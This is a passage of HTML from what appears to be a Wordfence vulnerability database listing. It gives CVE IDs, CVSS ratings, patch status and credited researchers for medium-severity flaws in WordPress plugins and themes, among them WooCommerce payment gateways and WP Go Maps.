<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3a44d04cdd3490b305d8f18cf157f1fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3a44d04cdd3490b305d8f18cf157f1fd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener">Robert Hartinger</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff1b8d09-974a-4735-8b63-15084412090d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1497a6e4-fc4a-4f12-bd89-01d468ccd128" target="_blank" rel="noopener">Payment Gateway for PayPal on WooCommerce &lt;= 9.1.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59547" target="_blank" rel="noopener noreferrer">							CVE-2026-59547						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-paypal-gateway" target="_blank" rel="noopener">Payment Gateway for PayPal on WooCommerce</a> <span class="wfvr-software-slug">[woo-paypal-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1497a6e4-fc4a-4f12-bd89-01d468ccd128" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4551afe6-905e-489c-83ce-0ad2f632e69f" target="_blank" rel="noopener">Payment Plugins for Stripe WooCommerce &lt;= 4.0.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59530" target="_blank" rel="noopener noreferrer">							CVE-2026-59530						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-stripe-payment" target="_blank" rel="noopener">Payment Plugins for Stripe WooCommerce</a> <span class="wfvr-software-slug">[woo-stripe-payment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/timomangcut" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9fe3b597e2bbd23928882d43475fdeb9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9fe3b597e2bbd23928882d43475fdeb9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/timomangcut" target="_blank" rel="noopener">timomangcut</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4551afe6-905e-489c-83ce-0ad2f632e69f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45185f25-9a1f-411d-9d2a-295b5ceb5629" target="_blank" rel="noopener">Payment Plugins for Stripe WooCommerce &lt;= 4.0.7 &#8211; Missing Authorization to Unauthenticated Arbitrary Order Status Modification via Empty Webhook Secret</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12654" target="_blank" rel="noopener noreferrer">							CVE-2026-12654						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-stripe-payment" target="_blank" rel="noopener">Payment Plugins for Stripe WooCommerce</a> <span class="wfvr-software-slug">[woo-stripe-payment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gidget-smith" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c8efd9cb349ced935be3ed3cedba2027.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c8efd9cb349ced935be3ed3cedba2027"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gidget-smith" target="_blank" rel="noopener">gidget smith</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45185f25-9a1f-411d-9d2a-295b5ceb5629" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a50f0b34-fce7-4bae-b3da-c2f521d15444" target="_blank" rel="noopener">PayU CommercePro Plugin &lt;= 3.8.9 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61954" target="_blank" rel="noopener noreferrer">							CVE-2026-61954						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payu-india" target="_blank" rel="noopener">PayU India</a> <span class="wfvr-software-slug">[payu-india]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a50f0b34-fce7-4bae-b3da-c2f521d15444" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44ed1f52-6c31-477d-ba32-8235d109024d" target="_blank" rel="noopener">PeproDev Ultimate Invoice &lt;= 2.2.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65499" target="_blank" rel="noopener noreferrer">							CVE-2026-65499						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pepro-ultimate-invoice" target="_blank" rel="noopener">PeproDev Ultimate Invoice</a> <span class="wfvr-software-slug">[pepro-ultimate-invoice]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener">babyhack</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44ed1f52-6c31-477d-ba32-8235d109024d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52223cd1-ee0d-484c-a2af-179b54bfc115" target="_blank" rel="noopener">PeproDev Ultimate Invoice &lt;= 2.2.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27372" target="_blank" rel="noopener noreferrer">							CVE-2026-27372						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pepro-ultimate-invoice" target="_blank" rel="noopener">PeproDev Ultimate Invoice</a> <span class="wfvr-software-slug">[pepro-ultimate-invoice]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/derrick-gilliland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/12f5edd9927331439d0317517c98b971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="12f5edd9927331439d0317517c98b971"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/derrick-gilliland" target="_blank" rel="noopener">Derrick Gilliland</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52223cd1-ee0d-484c-a2af-179b54bfc115" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e25fd68a-a4aa-4539-ba1a-de1d7b28c7ff" target="_blank" rel="noopener">Photography &lt;= 7.7.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65487" target="_blank" rel="noopener noreferrer">							CVE-2026-65487						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/photography-2" target="_blank" rel="noopener">photography</a> <span class="wfvr-software-slug">[photography]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e25fd68a-a4aa-4539-ba1a-de1d7b28c7ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b23dec43-ad7d-45d9-910e-b024b3c750c9" target="_blank" rel="noopener">Post My CF7 Form &lt;= 6.2.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59534" target="_blank" rel="noopener noreferrer">							CVE-2026-59534						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-my-contact-form-7" target="_blank" rel="noopener">Post My CF7 Form</a> <span class="wfvr-software-slug">[post-my-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b23dec43-ad7d-45d9-910e-b024b3c750c9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bc509aa6-b2e3-4589-8a26-a494c4be31f4" target="_blank" rel="noopener">Qubely – Advanced Gutenberg Blocks &lt;= 1.8.14 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65531" target="_blank" rel="noopener noreferrer">							CVE-2026-65531						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qubely" target="_blank" rel="noopener">Qubely – Advanced Gutenberg Blocks</a> <span class="wfvr-software-slug">[qubely]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bc509aa6-b2e3-4589-8a26-a494c4be31f4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b040a18-bd85-41c9-9add-65de79f5b79c" target="_blank" rel="noopener">Shiptastic for WooCommerce &lt;= 5.1.0 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65501" target="_blank" rel="noopener noreferrer">							CVE-2026-65501						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shiptastic-for-woocommerce" target="_blank" rel="noopener">Shiptastic for WooCommerce</a> <span class="wfvr-software-slug">[shiptastic-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/guillermo-alvarez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0874a18e229dcb2938b35928da78680.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0874a18e229dcb2938b35928da78680"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/guillermo-alvarez" target="_blank" rel="noopener">Guillermo Álvarez</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b040a18-bd85-41c9-9add-65de79f5b79c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/494c2abb-e675-4e3d-9784-8f70004a97f7" target="_blank" rel="noopener">Thrive Themes – Product Manager &lt;= 10.9.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59535" target="_blank" rel="noopener noreferrer">							CVE-2026-59535						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-product-manager" target="_blank" rel="noopener">Thrive Themes – Product Manager</a> <span class="wfvr-software-slug">[thrive-product-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/494c2abb-e675-4e3d-9784-8f70004a97f7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d58490a9-c48f-4693-8e42-70486563a731" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor &lt;= 3.0.5 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65505" target="_blank" rel="noopener noreferrer">							CVE-2026-65505						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</a> <span class="wfvr-software-slug">[ultimate-store-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d58490a9-c48f-4693-8e42-70486563a731" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9291dff0-84f0-4818-b71d-e68cab530698" target="_blank" rel="noopener">WP Fast Total Search – The Power of Indexed Search &lt;= 1.81.282 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27418" target="_blank" rel="noopener noreferrer">							CVE-2026-27418						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">WP Fast Total Search – The Power of Indexed Search</a> <span class="wfvr-software-slug">[fulltext-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e80ce9dc8cd55ea122ada90f882b7d82.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e80ce9dc8cd55ea122ada90f882b7d82"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener">Que Thanh Tuan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9291dff0-84f0-4818-b71d-e68cab530698" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/daa5e6a7-91ff-4dd0-aec2-f9a13e38f309" target="_blank" rel="noopener">WP Go Maps – Google Map, OpenStreetMap, Leaflet Map &lt;= 10.1.05 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-25466" target="_blank" rel="noopener noreferrer">							CVE-2026-25466						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-maps" target="_blank" rel="noopener">WP Go Maps – Google Map, OpenStreetMap, Leaflet Map</a> <span class="wfvr-software-slug">[wp-google-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
